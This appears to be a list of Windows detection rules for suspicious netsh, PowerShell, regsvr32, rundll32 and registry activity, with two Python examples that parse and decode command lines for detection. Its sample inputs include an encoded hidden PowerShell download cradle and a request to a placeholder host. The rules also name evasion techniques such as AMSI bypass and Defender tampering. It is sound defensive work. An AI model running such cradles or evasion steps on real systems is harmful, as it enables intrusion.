Firewall Rule Deleted Via Netsh.EXE | medium | Detects the removal of a port or application rule in the Windows Firewall configuration using netsh.
Firewall Disabled via Netsh.EXE | medium | Detects netsh commands that turn off the Windows Firewall.
Netsh Allow Group Policy on Microsoft Defender Firewall | medium | Adversaries may modify system firewalls in order to bypass controls limiting network usage.
Firewall Rule Update Via Netsh.EXE | medium | Detects execution of netsh with the "advfirewall" and "set" options in order to set new values for properties of an existing rule.
New Port Forwarding Rule Added Via Netsh.EXE | medium | Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule.
RDP Port Forwarding Rule Added Via Netsh.EXE | high | Detects the execution of netsh to configure a port forwarding rule for port 3389 (RDP).
Unmount Share Via Net.EXE | low | Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
Password Provided In Command Line Of Net.EXE | medium | Detects when net.exe is called with a password in the command line.
Potential Arbitrary Code Execution Via Node.EXE | high | Detects execution of node.exe, which ships with software such as VMware and Adobe products, in order to execute arbitrary code, for example to establish a reverse shell as seen in Log4j attacks.
Node Process Executions | medium | Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud.
Nslookup PowerShell Download Cradle - ProcessCreation | medium | Detects a suspicious PowerShell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.
Driver/DLL Installation Via Odbcconf.EXE | medium | Detects execution of "odbcconf" with "INSTALLDRIVER", which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.
Suspicious Driver/DLL Installation Via Odbcconf.EXE | high | Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't have a ".dll" extension. This is often used as a defense evasion method.
New DLL Registered Via Odbcconf.EXE | medium | Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
Odbcconf.EXE Suspicious DLL Location | high | Detects execution of "odbcconf" where the path of the DLL being registered is in a potentially suspicious location.
Potentially Suspicious DLL Registered Via Odbcconf.EXE | high | Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't have a ".dll" extension, which is often used as a method to evade defenses.
Response File Execution Via Odbcconf.EXE | medium | Detects execution of "odbcconf" with the "-f" flag in order to load a response file, which might contain a malicious action.
Suspicious Response File Execution Via Odbcconf.EXE | high | Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.
Uncommon Child Process Spawned By Odbcconf.EXE | medium | Detects an uncommon child process of the "odbcconf.exe" binary, which normally shouldn't have any child processes.
Potential Arbitrary File Download Using Office Application | high | Detects potential arbitrary file download using a Microsoft Office application.
Potentially Suspicious Office Document Executed From Trusted Location | high | Detects the execution of an Office application that points to a document located in a trusted location. Attackers often use this to avoid macro security and execute their malicious code.
OneNote.EXE Execution of Malicious Embedded Scripts | high | Detects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
Potential Arbitrary DLL Load Using Winword | medium | Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.
Suspicious Microsoft Office Child Process | high | Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.).
Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution | medium | Detects execution of Windows Defender "OfflineScannerShell.exe" from its non-standard directory. The "OfflineScannerShell.exe" binary is vulnerable to DLL sideloading and will load any DLL named "mpclient.dll" from the current working directory.
Ping Hex IP | high | Detects a ping command that uses a hex encoded IP address.
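The "New Port Forwarding Rule Added Via Netsh.EXE", "RDP Port Forwarding Rule Added Via Netsh.EXE" and "Ping Hex IP" rows above all describe command lines whose interesting value is not a fixed string: netsh accepts any unambiguous prefix of a parameter name (so "connectp=3389" is as valid as "connectport=3389"), and ping accepts a hex literal such as 0xC0A80001 in place of a dotted quad. The following Python is an added example written for this report, not code from the SigmaTACT tool or the Sigma project; it parses both forms and normalizes them before matching. The sample command lines are constructed for the example and are not real telemetry.

```python
import ipaddress
import re
import shlex

# Full netsh portproxy parameter names. netsh accepts any unambiguous prefix
# ("listenp=3389"), so matching on the literal "listenport=" string misses variants.
PORTPROXY_PARAMS = ("listenport", "listenaddress", "connectport", "connectaddress", "protocol")

RDP_RULE = "RDP Port Forwarding Rule Added Via Netsh.EXE"
PORTPROXY_RULE = "New Port Forwarding Rule Added Via Netsh.EXE"
HEX_PING_RULE = "Ping Hex IP"


def resolve_param(name):
    """Expand an abbreviated netsh parameter to its full name; None if unknown or ambiguous."""
    matches = [p for p in PORTPROXY_PARAMS if p.startswith(name.lower())]
    return matches[0] if len(matches) == 1 else None


def parse_portproxy(cmdline):
    """Return {parameter: value} for a 'netsh ... portproxy add ...' command line, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes
        return None
    lowered = [a.lower() for a in argv]
    if "portproxy" not in lowered or "add" not in lowered:
        return None
    params = {}
    for arg in argv:
        key, sep, value = arg.partition("=")
        full = resolve_param(key) if sep else None
        if full:
            params[full] = value.strip('"')
    return params


def check_portproxy(cmdline):
    """Classify a PortProxy addition; 3389 on either side is treated as RDP tunnelling."""
    params = parse_portproxy(cmdline)
    if params is None:
        return None
    if "3389" in (params.get("listenport"), params.get("connectport")):
        return RDP_RULE
    return PORTPROXY_RULE


def normalize_ping_target(token):
    """Convert a hex-form IPv4 literal (0xC0A80001) to a dotted quad; returns (value, was_hex)."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]{1,8}", token):
        return str(ipaddress.IPv4Address(int(token, 16))), True
    return token, False


def check_ping_hex_ip(cmdline):
    """Return the decoded dotted-quad address if ping was given a hex IP, else None."""
    argv = cmdline.split()
    if not argv or not argv[0].strip('"').lower().endswith(("ping", "ping.exe")):
        return None
    for tok in argv[1:]:
        ip, was_hex = normalize_ping_target(tok)
        if was_hex:
            return ip
    return None


def evaluate(cmdline):
    """Return the list of (rule, detail) findings for one process-creation command line."""
    findings = []
    rule = check_portproxy(cmdline)
    if rule:
        findings.append((rule, parse_portproxy(cmdline)))
    ip = check_ping_hex_ip(cmdline)
    if ip:
        findings.append((HEX_PING_RULE, ip))
    return findings


# Constructed sample command lines (not real telemetry).
SAMPLE_COMMAND_LINES = [
    "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=10.0.0.5",
    "netsh interface portproxy add v4tov4 listenp=4443 connecta=10.0.0.7 connectp=443",
    '"C:\\Windows\\System32\\PING.EXE" -n 1 0xC0A80001',
    "ping -n 1 192.168.0.1",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(evaluate(line) or "no finding", "<-", line)
```

The second sample uses abbreviated parameter names and is still classified correctly; a rule that only looks for the substring "3389" would fire on it too, but would also fire on an unrelated port such as 33890, which is why the port is compared as a whole value after parsing.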
Suspicious Powercfg Execution To Change Lock Screen Timeout | medium | Detects suspicious execution of 'Powercfg.exe' to change the lock screen timeout.
Potential AMSI Bypass Via .NET Reflection | high | Detects requests to "amsiInitFailed" that can be used to disable AMSI scanning.
Potential AMSI Bypass Using NULL Bits | medium | Detects usage of special strings/null bits in order to potentially bypass AMSI functionality.
Suspicious Obfuscated PowerShell Code | high | Detects suspicious UTF-16 and base64 encoded and often obfuscated PowerShell code often used in command lines.
PowerShell Base64 Encoded FromBase64String Cmdlet | high | Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line.
PowerShell Base64 Encoded Invoke Keyword | high | Detects UTF-8 and UTF-16 base64 encoded PowerShell 'Invoke-' calls.
Powershell Base64 Encoded MpPreference Cmdlet | high | Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modify or tamper with Windows Defender AV.
PowerShell Base64 Encoded Reflective Assembly Load | high | Detects base64 encoded .NET reflective loading of an assembly.
Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call | high | Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly".
Potential Process Execution Proxy Via CL_Invocation.ps1 | medium | Detects calls to "SyncInvoke", which is part of the "CL_Invocation.ps1" script, to proxy execution using "System.Diagnostics.Process".
PowerShell Base64 Encoded WMI Classes | high | Detects calls to base64 encoded WMI classes such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
Assembly Loading Via CL_LoadAssembly.ps1 | medium | Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass AppLocker controls.
Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 | medium | Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands.
Potential PowerShell Obfuscation Via Reversed Commands | high | Detects the presence of reversed PowerShell commands in the command line. This is often used as a method of obfuscation by attackers.
ConvertTo-SecureString Cmdlet Usage Via CommandLine | medium | Detects usage of the "ConvertTo-SecureString" cmdlet via the command line, which is fairly uncommon and could indicate potentially suspicious activity.
Potential PowerShell Command Line Obfuscation | high | Detects PowerShell command lines with special characters.
Powershell Defender Disable Scan Feature | high | Detects requests to disable Microsoft Defender features using PowerShell commands.
Powershell Defender Exclusion | medium | Detects requests to exclude files, folders or processes from antivirus scanning using PowerShell cmdlets.
Disable Windows Defender AV Security Monitoring | high | Detects attackers attempting to disable Windows Defender using PowerShell.
Windows Firewall Disabled via PowerShell | medium | Detects attempts to disable the Windows Firewall using PowerShell.
Potential PowerShell Downgrade Attack | medium | Detects a PowerShell downgrade attack by comparing the host version with the actually used engine version 2.0.
Disabled IE Security Features | high | Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features.
Obfuscated PowerShell OneLiner Execution | high | Detects the execution of a specific one-liner to download and execute PowerShell modules in memory.
Potential Suspicious Windows Feature Enabled - ProcCreation | medium | Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature", used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
Potential Encoded PowerShell Patterns In CommandLine | low | Detects specific combinations of encoding methods in PowerShell via the command line.
Base64 Encoded PowerShell Command Detected | high | Detects usage of the "FromBase64String" function in the command line, which is used to decode a base64 encoded string.
Abuse of Service Permissions to Hide Services Via Set-Service | high | Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (works only in PowerShell 7).
Root Certificate Installed From Susp Locations | high | Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
Unsigned AppX Installation Attempt Using Add-AppxPackage | medium | Detects usage of "Add-AppxPackage" or its alias "Add-AppPackage" to install unsigned AppX packages.
Suspicious PowerShell Invocations - Specific - ProcessCreation | medium | Detects suspicious PowerShell invocation command parameters.
Potential PowerShell Obfuscation Via WCHAR | high | Detects suspicious encoded character syntax often used for defense evasion.
Tamper Windows Defender Remove-MpPreference | high | Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet.
RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses | high | Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand", which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
Run PowerShell Script from ADS | high | Detects PowerShell script execution from an Alternate Data Stream (ADS).
Run PowerShell Script from Redirected Input Stream | high | Detects PowerShell script execution via input stream redirect.
PowerShell Set-Acl On Windows Folder | high | Detects PowerShell scripts that set the ACL of a file in the Windows folder.
PowerShell Script Change Permission Via Set-Acl | high | Detects PowerShell execution that sets the ACL of a file or a folder.
Service StartupType Change Via PowerShell Set-Service | medium | Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual".
Powershell Token Obfuscation - Process Creation | high | Detects the TOKEN OBFUSCATION technique from Invoke-Obfuscation.
Suspicious X509Enrollment - Process Creation | medium | Detects use of X509Enrollment.
Suspicious XOR Encoded PowerShell Command | medium | Detects presence of a potentially XOR encoded PowerShell command.
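The "PowerShell Base64 Encoded Invoke Keyword", "PowerShell Base64 Encoded FromBase64String Cmdlet", "Suspicious Obfuscated PowerShell Code" and "Base64 Encoded PowerShell Command Detected" rows above depend on one property of base64: a plaintext keyword appears in the encoded blob as one of exactly three substrings, selected by the keyword's byte offset modulo 3, and the UTF-16LE text that -EncodedCommand carries produces a different set of three than UTF-8 text does. The following Python is an added example written for this report, not code from the SigmaTACT tool or the Sigma project. It derives those signatures for any keyword and encoding, scans a command line for them, and also decodes an -EncodedCommand payload so the keyword can be matched in clear text. The sample command lines are constructed inside the block and are not real telemetry.

```python
import base64
import re

KEYWORDS = ("Invoke-", "FromBase64String")
ENCODINGS = ("utf-8", "utf-16le")


def base64_signatures(keyword, encoding):
    """Return the three base64 substrings that match `keyword` at any byte alignment.

    A substring of the plaintext shows up in base64 in one of three forms depending on
    its byte offset modulo 3. Only the 6-bit groups fully covered by the keyword's own
    bits are kept, so characters that also depend on neighbouring bytes are dropped.
    """
    raw = keyword.encode(encoding)
    sigs = []
    for offset in range(3):
        encoded = base64.b64encode(b"\x00" * offset + raw).decode("ascii")
        start = -(-8 * offset // 6)            # ceil(8*offset / 6)
        end = (8 * (offset + len(raw))) // 6   # floor(8*(offset+len) / 6)
        sigs.append(encoded[start:end])
    return sigs


# Precomputed once per (keyword, encoding) pair.
SIGNATURES = {(kw, enc): base64_signatures(kw, enc) for kw in KEYWORDS for enc in ENCODINGS}

# -EncodedCommand may be abbreviated to any prefix from -e onwards; the payload is
# base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r"[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Decode an -EncodedCommand payload; None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return None


def scan_command_line(cmdline):
    """Return a set of (keyword, how) hits for one process-creation command line."""
    hits = set()
    # Raw signature matching works even when the blob is nested inside
    # FromBase64String('...') and cannot be decoded from the command line alone.
    for (kw, enc), sigs in SIGNATURES.items():
        if any(sig in cmdline for sig in sigs):
            hits.add((kw, f"base64/{enc}"))
    decoded = decode_encoded_command(cmdline)
    if decoded:
        for kw in KEYWORDS:
            if kw.lower() in decoded.lower():
                hits.add((kw, "decoded"))
    return hits


def _b64(text, encoding):
    return base64.b64encode(text.encode(encoding)).decode("ascii")


# Constructed sample command lines (not real telemetry); the payloads are built here so
# the base64 is exact.
SAMPLES = {
    "encoded": "powershell.exe -nop -w hidden -enc "
               + _b64("Invoke-Expression (Get-Content .\\stage.txt)", "utf-16le"),
    # "Invoke-" starts at byte 16 of the UTF-16LE text, so the offset-1 signature fires.
    "offset": "powershell.exe -e "
              + _b64("$p = 1; Invoke-WebRequest -Uri http://example.invalid/x", "utf-16le"),
    "nested": "powershell.exe -c \"IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
              + _b64("Invoke-Expression $env:x", "utf-8") + "')))\"",
    "benign": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
}

if __name__ == "__main__":
    for enc in ENCODINGS:
        print(enc, base64_signatures("Invoke-", enc))
    for name, line in SAMPLES.items():
        print(f"{name}: {sorted(scan_command_line(line)) or 'no hit'}")
```

Matching the signatures against the raw command line is what catches the "nested" case, where the blob is an argument to FromBase64String rather than to -EncodedCommand; decoding is what lets a rule match on the keyword in clear text regardless of alignment. Both are needed, and neither catches a payload that has been XOR- or otherwise transformed before base64 encoding, which is why the XOR row above exists as a separate rule.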
Arbitrary File Download Via PresentationHost.EXE | medium | Detects usage of "PresentationHost", a utility that runs ".xbap" (Browser Applications) files, to download arbitrary files.
XBAP Execution From Uncommon Locations Via PresentationHost.EXE | medium | Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files and bypass AWL.
Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution | medium | Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe, which can be used to execute any other binary.
Abusing Print Executable | medium | Attackers can use print.exe for remote file copy.
File Download Using ProtocolHandler.exe | medium | Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE).
Suspicious Provlaunch.EXE Child Process | high | Detects suspicious child processes of "provlaunch.exe", which might indicate potential abuse to proxy execution.
Potential Provlaunch.EXE Binary Proxy Execution Abuse | medium | Detects child processes of "provlaunch.exe", which might indicate potential abuse to proxy execution.
PUA - AdvancedRun Execution | medium | Detects the execution of the AdvancedRun utility.
PUA - AdvancedRun Suspicious Execution | high | Detects the execution of the AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts.
PUA - CleanWipe Execution | high | Detects the use of CleanWipe, a tool usually used to remove Symantec antivirus products.
PUA - DefenderCheck Execution | high | Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains Microsoft Defender uses to detect a tool and thus aid AV evasion.
PUA - Process Hacker Execution | medium | Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc.). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors have abused older vulnerable versions to manipulate system processes.
PUA - Potential PE Metadata Tamper Using Rcedit | medium | Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
PUA - System Informer Execution | medium | Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations.
Suspicious RASdial Activity | medium | Detects suspicious processes related to rasdial.exe.
Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension | medium | Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location | medium | Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location.
Imports Registry Key From a File | medium | Detects the import of the specified file to the registry with regedit.exe.
Imports Registry Key From an ADS | high | Detects the import of an alternate data stream to the registry with regedit.exe.
Suspicious Registry Modification From ADS Via Regini.EXE | high | Detects the import of an alternate data stream with regini.exe, which can be used to modify registry keys.
Registry Modification Via Regini.EXE | low | Detects the execution of regini.exe, which can be used to modify registry keys; the changes are imported from one or more text files.
DLL Execution Via Register-cimprovider.exe | medium | Detects use of register-cimprovider.exe to execute an arbitrary DLL file.
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI | high | Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows files downloaded from the Internet to be granted the same level of trust as files stored locally.
Python Function Execution Security Warning Disabled In Excel | high | Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
Potential Provisioning Registry Key Abuse For Binary Proxy Execution | high | Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
Potential PowerShell Execution Policy Tampering - ProcCreation | high | Detects changes to the PowerShell execution policy registry key from the command line in order to bypass signing requirements for script execution.
Potential Regsvr32 Commandline Flag Anomaly | medium | Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without "/n", which should be uncommon.
Potentially Suspicious Regsvr32 HTTP IP Pattern | high | Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
Potentially Suspicious Regsvr32 HTTP/FTP Pattern | medium | Detects regsvr32 execution to download/install/register new DLLs that are hosted on web or FTP servers.
Suspicious Regsvr32 Execution From Remote Share | high | Detects REGSVR32.exe executing a DLL hosted on a remote share.
Potentially Suspicious Child Process Of Regsvr32 | high | Detects potentially suspicious child processes of "regsvr32.exe".
Regsvr32 Execution From Potential Suspicious Location | medium | Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
Regsvr32 Execution From Highly Suspicious Location | high | Detects execution of regsvr32 where the DLL is located in a highly suspicious location.
Regsvr32 DLL Execution With Suspicious File Extension | high | Detects the execution of REGSVR32.exe with DLL files masquerading as other file types.
Scripting/CommandLine Process Spawned Regsvr32 | medium | Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
Regsvr32 DLL Execution With Uncommon Extension | medium | Detects a "regsvr32" execution where the DLL doesn't have a common file extension.
Add SafeBoot Keys Via Reg Utility | high | Detects execution of "reg.exe" commands with the "add" or "copy" flags on Safe Boot registry keys. Often used by attackers to allow ransomware to run in Safe Mode, where some security products do not.
SafeBoot Registry Key Deleted Via Reg.EXE | high | Detects execution of "reg.exe" commands with the "delete" flag on Safe Boot registry keys. Often used by attackers to prevent Safe Boot execution of security products.
Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE | medium | Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.
Service Registry Key Deleted Via Reg.EXE | high | Detects execution of "reg.exe" commands with the "delete" flag on services registry keys. Often used by attackers to remove AV software services.
Potentially Suspicious Desktop Background Change Using Reg.EXE | medium | Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
Security Service Disabled Via Reg.EXE | high | Detects execution of "reg.exe" to disable security services such as Windows Defender.
Potential Suspicious Registry File Imported Via Reg.EXE | medium | Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility.
LSA PPL Protection Disabled Via Reg.EXE | high | Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process.
Modify Group Policy Settings | medium | Detects malicious GPO modifications, which can be used to implement many other malicious behaviors.
Enable LM Hash Storage - ProcCreation | high | Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN Manager hash of your password in Active Directory and local SAM databases.
RestrictedAdminMode Registry Value Tampering - ProcCreation | high | Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.
Potential Tampering With RDP Related Registry Keys Via Reg.EXE | high | Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values.
Reg Add Suspicious Paths | high | Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys.
Disabled Volume Snapshots | high | Detects commands that temporarily turn off Volume Snapshots.
Suspicious Windows Defender Registry Key Tampering Via Reg.EXE | high | Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable important features related to protection and detection.
Write Protect For Storage Disabled | medium | Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by the cypherpunk group.
Remote Access Tool - RURAT Execution From Unusual Location | medium | Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files').
Remote Access Tool - NetSupport Execution From Unusual Location | medium | Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files').
Renamed AutoHotkey.EXE Execution | medium | Detects execution of a renamed autohotkey.exe binary based on PE metadata fields.
Renamed AutoIt Execution | high | Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.
Potential Defense Evasion Via Binary Rename | medium | Detects the execution of a renamed binary often used by attackers or malware, leveraging the Sysmon OriginalFileName data point.
Potential Defense Evasion Via Rename Of Highly Relevant Binaries | high | Detects the execution of a renamed binary often used by attackers or malware, leveraging the Sysmon OriginalFileName data point.
Renamed BOINC Client Execution | medium | Detects the execution of a renamed BOINC binary.
Renamed CreateDump Utility Execution | high | Detects use of a renamed legitimate createdump.exe LOLBIN utility to dump process memory.
Renamed CURL.EXE Execution | medium | Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields.
Renamed ZOHO Dctask64 Execution | high | Detects a renamed "dctask64.exe" execution, a binary signed by ZOHO Corporation and part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
Renamed FTP.EXE Execution | medium | Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields.
Renamed Jusched.EXE Execution | high | Detects the execution of a renamed "jusched.exe" as seen used by the Cobalt group.
Renamed Mavinject.EXE Execution | high | Detects the execution of a renamed version of the "Mavinject" process, which can be abused to perform process injection using the "/INJECTRUNNING" flag.
Renamed MegaSync Execution | high | Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
Renamed Msdt.EXE Execution | high | Detects the execution of a renamed "Msdt.exe" binary.
Renamed Microsoft Teams Execution | medium | Detects the execution of a renamed Microsoft Teams binary.
Renamed NetSupport RAT Execution | high | Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings.
Renamed NirCmd.EXE Execution | high | Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
Renamed Office Binary Execution | high | Detects the execution of a renamed Office binary.
Renamed PAExec Execution | high | Detects execution of a renamed version of PAExec. Often used by attackers.
Renamed PingCastle Binary Execution | high | Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
Renamed Plink Execution | high | Detects the execution of a renamed version of the Plink binary.
Visual Studio NodejsTools PressAnyKey Renamed Execution | medium | Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries.
Renamed Remote Utilities RAT (RURAT) Execution | medium | Detects execution of renamed Remote Utilities (RURAT) via the Product PE header field.
Renamed ProcDump ExecutionhighDetects the execution of a renamed ProcDump executable. This often done by attackers or malware in order to evade defensive mechanisms.
Renamed Vmnat.exe ExecutionhighDetects renamed vmnat.exe or portable version that can be used for DLL side-loading
Potential Rundll32 Execution With DLL Stored In ADShighDetects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
Suspicious Advpack Call Via Rundll32.EXEhighDetects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function
Suspicious Rundll32 Invoking Inline VBScripthighDetects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
Rundll32 InstallScreenSaver ExecutionmediumAn attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
Rundll32 Execution Without CommandLine ParametershighDetects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
Mshtml.DLL RunHTMLApplication Suspicious UsagehighDetects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
Potential Obfuscated Ordinal Call Via Rundll32mediumDetects execution of "rundll32" with potential obfuscated ordinal calls
Rundll32 Spawned Via Explorer.EXEmediumDetects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
Process Memory Dump Via Comsvcs.DLLhighDetects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
Suspicious Process Start LocationsmediumDetects suspicious process run from unusual locations
Suspicious Rundll32 Setupapi.dll Activitymediumsetupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.
Shell32 DLL Execution in Suspicious DirectoryhighDetects shell32.dll executing a DLL in a suspicious directory
Potential ShellDispatch.DLL Functionality AbusemediumDetects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
RunDLL32 Spawning ExplorerhighDetects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
Potentially Suspicious Rundll32 ActivitymediumDetects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
Suspicious Control Panel DLL LoadhighDetects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
Suspicious Rundll32 Execution With Image ExtensionhighDetects the execution of Rundll32.exe with DLL files masquerading as image files
Suspicious Usage Of ShellExec_RunDLLhighDetects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack
Suspicious ShellExec_RunDLL Call Via OrdinalhighDetects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.
ShimCache FlushhighDetects actions that clear the local ShimCache and remove forensic evidence
Suspicious Rundll32 Activity Invoking Sys FilehighDetects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
Rundll32 Execution With Uncommon DLL ExtensionmediumDetects the execution of rundll32 with a command line that doesn't contain a common extension
Rundll32 UNC Path ExecutionhighDetects rundll32 execution where the DLL is located on a remote location (share)
Suspicious Workstation Locking via Rundll32mediumDetects a suspicious call to the user32.dll function that locks the user workstation
Run Once Task Execution as Configured in RegistrylowThis rule detects the execution of Run Once task as configured in the registry
Suspicious Scheduled Task Creation via Masqueraded XML FilemediumDetects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
